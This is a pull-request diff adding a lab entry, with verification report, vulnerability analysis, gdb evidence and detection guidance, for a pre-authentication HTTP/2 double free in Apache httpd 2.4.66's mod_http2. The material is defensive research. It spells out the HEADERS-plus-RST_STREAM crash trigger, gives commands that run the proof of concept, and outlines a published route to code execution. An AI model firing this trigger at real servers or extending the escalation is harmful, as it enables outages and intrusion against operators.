+| Transport | cleartext h2c, prior knowledge |
+| PoC | `poc/poc.py`, Python 3 stdlib only |
+
+## Results
+
+### Run 1 — crash campaign (2.4.66 vs 2.4.67, default log level)
+
+| Target | Trigger | Child `SIGSEGV` log lines | `AH10392` warnings | External probes post-run |
+|---|---|---|---|---|
+| 2.4.66 | 60 connections × 8 HEADERS+RST couples | **60** | multiple | 0/3 failed (children restart ~1 s) |
+| 2.4.67 | identical | **0** | none | 0/3 failed |
+
+### Run 2 — trace2 lifecycle comparison (6 connections × 2 couples each)
+
+| Target | `move to spurge` lines | Streams triggered | Pushes per stream | Child crashes |
+|---|---|---|---|---|
+| 2.4.66 (`h2_mplx.c:181`) | **24** | 12 | **2 (duplicate)** | 6 |
+| 2.4.67 (`h2_mplx.c:195`) | **12** | 12 | 1 (deduped) | 0 |
+
+Representative vulnerable lines — note the identical stream tuple on consecutive entries:
+
+```
+h2_stream(10-4-1,CLEANUP): cleanup, never started, move to spurge
+h2_stream(10-4-1,CLEANUP): cleanup, never started, move to spurge
+```
+
+### Run 3 — gdb crash capture (2.4.66, `httpd -X` under gdb)
+
+- SIGSEGV in `c1_purge_streams` at `h2_mplx.c:606`; faulting instruction `ldr w0, [x19, #24]` (= `stream->state`) with `x19` pointing into a `munmap`ed page; backtrace `h2_mplx_c1_poll → h2_session_process → h2_c1_run → ap_run_process_connection → event.c worker_thread`.
+- Full capture: `artifacts/gdb-crash-capture.txt`.
+
+### Run 4 — gdb breakpoint capture (2.4.66, breakpoint at `h2_mplx.c:606`)
+
+- Iteration 0: full live `h2_stream` dump (`id=1, state=H2_SS_CLEANUP, rst_error=5, c2=0x0`); `spurge->nelts=4` for two triggered streams.
+- Iteration 1: same pointer `0xffff875470a0`, `Cannot access memory` — the object was destroyed by the immediately preceding iteration.
+- Full capture: `artifacts/gdb-purge-dump.txt`; script: `artifacts/capture.gdb`.
+
+### Run 5 — control (`poc/control_test.py`, both targets)
+
+25 rounds × (2 complete GETs read to END_STREAM + one late `RST_STREAM` NO_ERROR) per target: all served, post-run health probe green on 2.4.66 and 2.4.67 → `[CONTROL PASS]`. Normal HTTP/2 usage, including legal resets, does not exercise the bug.
+
+## Reproduction
+
+```bash
+cd CVE-2026-23918
+docker compose up -d --build && docker compose ps     # both healthy
+
+python3 poc/control_test.py http://127.0.0.1:8080     # CONTROL PASS
+python3 poc/poc.py http://127.0.0.1:8080 --i-am-authorized --iterations 60 --pairs 8
+docker compose logs vulnerable 2>&1 | grep -c 'exit signal Segmentation'   # > 0
+
+python3 poc/poc.py http://127.0.0.1:8081 --i-am-authorized --iterations 60 --pairs 8
+docker compose logs patched 2>&1 | grep -c 'exit signal Segmentation'      # 0
+
+docker compose down -v
+```
+
+## Limitations (stated plainly)
+
+- A **negative** PoC result is not proof of safety: with the APR mmap allocator the double free can corrupt silently (the exploitable case), and child respawn masks crashes externally. Version + MPM + module configuration is the authoritative exposure test.
+- All runs here used cleartext h2c. The frame sequence is identical over TLS+ALPN (`poc.py` supports `https://` targets); no TLS-specific behavior is part of the bug.
+- RCE was not attempted. The escalation discussion in `vulnerability_analysis.md` §6 is an assessment of public record, not a lab result.

--- a/CVE-2026-23918/vulnerability_analysis.md
+++ b/CVE-2026-23918/vulnerability_analysis.md
@@ -1,0 +1,177 @@
+# Vulnerability Analysis — CVE-2026-23918
+
+## Summary
+
+Apache HTTP Server 2.4.66 ships mod_http2 v2.0.36, in which an HTTP/2 stream that is reset by the client *before the multiplexer has registered it* is scheduled for destruction twice. The purge routine then destroys the same `h2_stream` twice: a pre-authentication, remotely triggered double free. The bug was introduced by the v2.0.36 revert of the per-stream memory allocator (originally added in v2.0.33) and is fixed in v2.0.37 (httpd 2.4.67, r1930444) by deduplicating the purge list and restoring per-stream allocators.
+
+This analysis is anchored to three evidence layers, all reproduced in this entry's lab:
+
+1. **Source**: the upstream fix diff (`artifacts/mod_h2-v2.0.36...v2.0.37.diff`) read against the v2.0.36 code.
+2. **Logs**: `http2:trace2` showing the same stream entering `spurge` twice on 2.4.66, once on 2.4.67.
+3. **Machine state**: gdb crash capture and breakpoint capture showing the duplicate entry being dereferenced after free.
+
+## 1. The purge mechanism and the three push sites
+
+mod_http2 separates the client-facing connection thread (c1) from worker threads that process individual streams (c2). Finished streams are collected on `m->spurge`, an APR array of `h2_stream*`, and destroyed in batch by `c1_purge_streams()` at the top of each `h2_mplx_c1_poll()` cycle and during connection teardown:
+
+```c
+static void c1_purge_streams(h2_mplx *m)          /* h2_mplx.c, v2.0.36 */
+{
+    h2_stream *stream;
+    int i;
+    for (i = 0; i < m->spurge->nelts; ++i) {
+        stream = APR_ARRAY_IDX(m->spurge, i, h2_stream*);
+        ap_assert(stream->state == H2_SS_CLEANUP);     /* line 606 */
+        if (stream->input) { ... }
+        if (stream->c2)    { ... }
+        h2_stream_destroy(stream);                     /* frees stream + pool */
+    }
+    apr_array_clear(m->spurge);
+}
+```
+
+In v2.0.36, three call sites feed `spurge`, all with a raw, unguarded push:
+
+1. `c1c2_stream_joined()` — a processed stream whose c2 finished.
+2. `m_stream_cleanup()`, "c2 is done" branch.
+3. `m_stream_cleanup()`, "never started" branch (`h2_conn_ctx_get(stream->c2)` is NULL).
+
+The *started*-stream path had incidental protection: `s_c2_done()` scans `spurge` and refuses a duplicate (`APLOGNO(03517) "already in spurge"`). The **never-started** path never transits `s_c2_done`, so nothing deduplicates it. That asymmetry is the whole bug.
+
+## 2. The early reset — reaching the double push
+
+`h2_mplx_c1_client_rst()` handles client resets and contains a branch whose own comment names the trigger:
+
+```c
+apr_status_t h2_mplx_c1_client_rst(h2_mplx *m, int stream_id, h2_stream *stream)
+{
+    ...
+    registered = (h2_ihash_get(m->streams, stream_id) != NULL);
+    ...
+    else if (!registered) {
+      /* a RST on a stream that mplx has not been told about, but
+       * which the session knows. Very early and annoying. */
+      h2_stream_set_monitor(stream, NULL);
+      h2_stream_rst(stream, H2_ERR_STREAM_CLOSED);
+      h2_stream_dispatch(stream, H2_SEV_EOS_SENT);
+      m_stream_cleanup(m, stream);          /* FIRST cleanup -> push #1 */
+      m_be_annoyed(m);
+    }
+    ...
+}
+```
+
+When `HEADERS` is followed immediately by `RST_STREAM` (non-zero error) on the same stream id — sent back-to-back right after the connection preface — nghttp2 fires `on_frame_recv_cb` for the RST while the stream is still unknown to the mplx ("very early RST, drop" → cleanup #1, push #1). The subsequent stream-close callback (`on_stream_close_cb` → `h2_mplx_c1_stream_cleanup`) runs `m_stream_cleanup()` a **second** time for the same stream; it still has no c2 context, so the "never started" branch pushes it **again** (push #2). `spurge` now holds the same pointer twice.
+
+Two data-level fingerprints from the lab capture confirm this exact path (not a generic reset):
+
+- The dumped stream has `c2 = 0x0` (never started), corroborated by the trace line `h2_mplx(...): stream 1 not found to process` (`h2_mplx.c:758`).
+- The client sent `RST_STREAM error=8` (CANCEL), yet the dumped struct records `rst_error = 5` (`H2_ERR_STREAM_CLOSED`) — the value the vulnerable branch stamps via `h2_stream_rst()`. The stream provably transited the "very early RST" branch.
+
+## 3. Detonation — the double destroy
+
+On the next poll cycle, `h2_mplx_c1_poll()` runs `if (m->spurge->nelts) c1_purge_streams(m);` (`h2_mplx.c:659` in the captured frame). Iteration 0 validates and destroys the stream (`h2_stream_destroy` → `apr_pool_destroy` → the allocation returns to the OS via `munmap` on this build). Iteration 1 reads the **duplicate** array entry — a dangling pointer — and its first dereference faults:
+
+```
+Thread 37 "httpd" received signal SIGSEGV, Segmentation fault.
+#0  c1_purge_streams (m=0xffffbbbba738) at ./modules/http2/h2_mplx.c:606
+#1  h2_mplx_c1_poll (timeout=0, ...)     at ./modules/http2/h2_mplx.c:659
+#2  h2_session_process (async=1)         at ./modules/http2/h2_session.c:2013
+#3  h2_c1_run                            at ./modules/http2/h2_c1.c:132
+#4  ap_run_process_connection            at ./server/connection.c:42
+#5  process_socket                       at ./server/mpm/event/event.c:1098
+#6  worker_thread                        at ./server/mpm/event/event.c:2252
+
+=> 0xffffbb19906c <c1_purge_streams+108>:  ldr  w0, [x19, #24]    ; stream->state (+0x18)
+   0xffffbb199070 <c1_purge_streams+112>:  cmp  w0, #0x7           ; H2_SS_CLEANUP == 7
+x19 = 0xffffbbb8a0a0   (the dead h2_stream*)
+```
+
+The faulting instruction is the `ap_assert(stream->state == H2_SS_CLEANUP)` read at line 606: `state` sits at offset +0x18, `H2_SS_CLEANUP` is enum value 7, and the load faults because the page was `munmap`ed by the previous iteration. The breakpoint capture makes the transition explicit — the same pointer, one loop iteration apart:
+
+```
+===== PURGE HIT =====                (iteration 0: live object)
+loop i = 0 of spurge->nelts = 4      (2 streams × 2 pushes each)
+stream = 0xffff875470a0
+$1 = { id = 1, state = H2_SS_CLEANUP, pool = 0xffff87547028,
+       rst_error = 5, c2 = 0x0, input_closed = 1, ... }
+
+===== PURGE HIT =====                (iteration 1: same pointer)
+loop i = 1 of spurge->nelts = 4
+stream = 0xffff875470a0
+Cannot access memory at address 0xffff875470a0
+```
+
+(Full evidence: `artifacts/gdb-crash-capture.txt`, `artifacts/gdb-purge-dump.txt`, `artifacts/capture.gdb`.)
+
+Note the thread story in frames #4–#6: the purge runs on the c1 connection thread of a threaded MPM. This architecture does not exist under MPM `prefork`, which is why prefork is not affected.
+
+## 4. The fix (mod_h2 v2.0.37 / httpd r1930444)
+
+Two coordinated changes (full diff in `artifacts/`):
+
+1. **Deduplication** — a new helper guards all three push sites:
+
+```c
+static int add_for_purge(h2_mplx *m, h2_stream *stream)
+{
+    int i;
+    for (i = 0; i < m->spurge->nelts; ++i) {
+        h2_stream *s = APR_ARRAY_IDX(m->spurge, i, h2_stream*);
+        if (s == stream)  /* already scheduled for purging */
+            return FALSE;
+    }
+    APR_ARRAY_PUSH(m->spurge, h2_stream *) = stream;
+    return TRUE;
+}
+```
+
+This generalizes the guard that previously existed only in `s_c2_done()` to every path, including never-started streams.
+
+2. **Per-stream allocator restored** — `h2_session_open_stream()` again creates each stream pool with its own `apr_allocator_t` (`apr_pool_create_ex` + owner + `abort_on_oom`), undoing the v2.0.36 revert. Defense in depth: even if a double destroy ever recurred, a stream pool no longer shares an allocator with sibling streams and the connection, containing the blast radius.
+
+**Fix assessment**: complete for the reported vector. The dedup is O(n) over a small array and covers all push sites; the lab confirms 12 pushes / 12 streams and zero crashes under the identical trigger. No bypass identified; the narrow window (only 2.4.66 ever shipped v2.0.36) further limits residual exposure. One observation, not a bypass: the "very early RST" branch still runs `m_stream_cleanup` twice for the same stream — the fix makes that harmless rather than restructuring the flow.
+
+## 5. Trigger specification (what the PoC sends)
+
+Per connection, immediately after the HTTP/2 preface and an empty SETTINGS frame, in a single write:
+
+```
+HEADERS  stream=1  END_HEADERS|END_STREAM   (:method GET, :scheme, :path /, :authority)
+RST_STREAM stream=1 error=0x8 (CANCEL)
+[repeat on streams 3, 5, ... ]
+```
+
+No HPACK dynamics, no flow-control interaction, no authentication. Any non-zero RST error code works; `0x8` is used because the public record describes the trigger as a non-zero-code reset. Trigger-connection closure afterwards is **normal on both builds** and is not a detection signal (see verification report for the detection discussion).
+
+## 6. Primitive layering and exploitability assessment
+
+What is proven in this lab, in escalating order:
+
+| Layer | Primitive | Status here |
+|---|---|---|
+| P0 | Pre-auth placement of a duplicate purge entry — 2 frames, 100% reliable | **Proven** (trace2 double push) |
+| P1 | Use-after-free **read** of `stream->state` on the destroyed object | **Proven** (faulting `ldr [x19,#24]`) |
+| P2 | **Double destroy**: `h2_stream_destroy` re-executes on the freed object; the pool cleanup chain re-runs on a dead pool | **Proven** (duplicate entry consumed by the purge loop; process death follows) |
+| P3 | **Type confusion**: reallocation of the freed region with attacker-influenced content before the second destroy, yielding a fake `h2_stream` whose destruction drives controlled function pointers | **Not attempted** — publicly described; see below |
+
+Honest severity framing, because "DoS" and "RCE" are different claims about the *same* bug:
+
+- **DoS is trivial and reliable.** In testing, roughly one worker child died per trigger connection (60 segfaults / 60 connections). Sustained fire kills children faster than `mpm_event` respawns them — a full outage is cheap. This needs no further conditions.
+- **The bug is RCE-class, and the conditions are common, not exotic.** The Apache advisory itself says "possible RCE"; Red Hat rates it Important specifically because it is pre-auth heap corruption. The publicly described chain (Hadrian and others) relies on the **APR mmap allocator** — the default in Debian builds and the official Docker image — where the freed region can be re-mapped and reused with attacker-influenced content (fake `h2_stream` → pool cleanup function pointer → `system()`), with the Apache scoreboard cited as a fixed-address container that eases ASLR. Deployment uniformity helps the attacker here: every `httpd:2.4.66` container shares the same binary, libc, and layout, which largely dissolves the "per-target address knowledge" barrier.
+- **The main restraint is the module author's own assessment.** Stefan Eissing notes the embargo-period RCE "required an unguarded libc... and knowledge about the server process address layout. Not impossible, but also not easily applied to any server out there." No public weaponized exploit exists at lab build time; only crash-primitive PoCs circulate.
+- **Outcome is allocator-state dependent, which matters for detection.** The same trigger yields SIGSEGV (page still unmapped — our capture), glibc abort (tcache double-free detection), or **silent corruption** (page reused — the exploitable case, and the one that may leave no log entry). A clean external probe therefore proves nothing; exposure is decided by version + MPM + h2 configuration, not by observed crashes.
+
+**Bottom line for defenders**: treat any 2.4.66 + HTTP/2 + threaded-MPM instance as RCE-capable and patch to 2.4.67+ (ideally 2.4.68) as an emergency. The primitive this entry proves (P0–P2) is the same primitive the documented RCE chain starts from; the gap to RCE is heap grooming, not a different bug.
+
+## 7. Detection and hunting
+
+- **Version/config (authoritative)**: `httpd -v` == 2.4.66; `apache2ctl -M` shows `mpm_event|worker` + `http2_module`; `Protocols` includes h2/h2c. Debian/Ubuntu: check package changelog for the 2026-01-23 backport.
+- **Error log (ground truth)**: `AH00052: child pid N exit signal Segmentation fault (11)` bursts and `AH10392: children are killed successively!` during/after h2 traffic.
+- **trace2 (forensic, lab)**: `LogLevel warn http2:trace2` — the same stream logged `cleanup, never started, move to spurge` twice consecutively is the double push itself.
+- **Network**: bursts of `RST_STREAM` with non-zero error codes immediately following `HEADERS` on new streams, especially multiple couples per connection.
+- **Retro-hunt window**: 2.4.66 was current from 2025-12-04 to 2026-05-04. A successful RCE may leave none of the above.
+
+## 8. Scope of this entry
+
+This package proves the corruption primitive and provides the vulnerable/patched A/B lab. It deliberately does **not** include heap grooming, reuse control, or any code-execution content. The interception point (P2) and the publicly described escalation (P3) are documented for defender understanding, not implemented.

--- a/README.md
+++ b/README.md
@@ -82,6 +82,7 @@ No hand-holding. No cherry-picked targets. One CVE number in, complete lab out.
 | [CVE-2025-6000](CVE-2025-6000/) | HashiCorp Vault | Audit Log Prefix Code Injection to RCE | **9.1** | No |
 | [CVE-2025-68670](CVE-2025-68670/) | xrdp | Pre-Auth Stack Buffer Overflow (RIP Control / RCE Primitives) | **9.1** | **Yes** — v0.10.5 fix misses `xrdp_sec.c` heap overflow path |
 | [CVE-2026-59083](CVE-2026-59083/) | Apache Tomcat | RewriteValve URL-Decoding Security-Constraint Bypass | **9.1** | No |
+| [CVE-2026-23918](CVE-2026-23918/) | Apache HTTP Server (mod_http2) | Pre-Auth HTTP/2 Early-Reset Double Free (DoS) | **8.8** | No |
 | [CVE-2025-66524](CVE-2025-66524/) | Apache NiFi | Unsafe Deserialization via GetAsanaObject Processor | **8.8** | No |
 | [CVE-2026-0766](CVE-2026-0766/) | Open WebUI | exec() Code Injection to RCE | **8.8** | No |
 | [CVE-2026-0765](CVE-2026-0765/) | Open WebUI | pip Command Injection to RCE (0-day) | **8.8** | No |
@@ -122,7 +123,7 @@ No hand-holding. No cherry-picked targets. One CVE number in, complete lab out.
 | [CVE-2026-64608](CVE-2026-64608/) | Apache Fory (C++) | Compatible-Mode Heap Type Confusion | **9.8** | No |
 | [CVE-2025-59060](CVE-2025-59060/) | Apache Ranger | Apache Ranger TLS Hostname Verification Bypass | **N/A** | No |
 
-23 out of 108 runs ended with bypass or incomplete-fix findings. That's either bad luck or a pattern worth paying attention to.
+23 out of 109 runs ended with bypass or incomplete-fix findings. That's either bad luck or a pattern worth paying attention to.
 
 ---
 


### PR DESCRIPTION
## Summary

New self-contained entry for **CVE-2026-23918** — the Apache HTTP Server 2.4.66 `mod_http2` double purge / double free (CWE-415), triggered pre-authentication by an HTTP/2 `HEADERS` + immediate `RST_STREAM` (non-zero error) before multiplexer registration.

Primitive-level entry: proves the memory-corruption primitive end-to-end and documents the publicly described RCE escalation path for defenders. **No weaponization** — no heap grooming, no code execution content.

## Contents

- Two-target compose lab: `httpd:2.4.66` (vulnerable, :8080) vs `httpd:2.4.67` (patched control, :8081), `mpm_event` + h2c
- `poc/poc.py` — stdlib-only trigger + crash detector (requires explicit `--i-am-authorized`)
- `poc/control_test.py` — well-formed h2 traffic incl. late RSTs is safe on both builds
- Full writeups: intel brief, source-anchored vulnerability analysis (fix diff v2.0.36→v2.0.37), verification + lab build reports
- Evidence artifacts: fix diff, `http2:trace2` double-push excerpts (both builds), gdb crash backtrace, gdb live-vs-freed object capture

## Verification (fresh lab, this branch)

| Test | httpd:2.4.66 | httpd:2.4.67 |
|---|---|---|
| `control_test.py` (25 rounds) | PASS | PASS |
| `poc.py` 30 conns × 8 couples | **30 child SIGSEGVs** | **0 crashes** |
| trace2 `move to spurge` | 24 lines / 12 streams (**doubled**) | 12 / 12 (deduped) |

## House checklist

- [x] PoC parses, imports stdlib-only, exec bits set
- [x] No machine-local paths in docs/scripts
- [x] End-to-end smoke test: `docker compose up -d --build` → PoC vs both targets → `down -v`
- [x] Root README table row added (8.8 tier); bypass count unchanged (fix holds, no `bypass_analysis.md`)
- Note: raw evidence artifacts contain Docker-internal IPs (`192.168.65.1`, `172.17.0.x`) — platform constants, left intact for evidence fidelity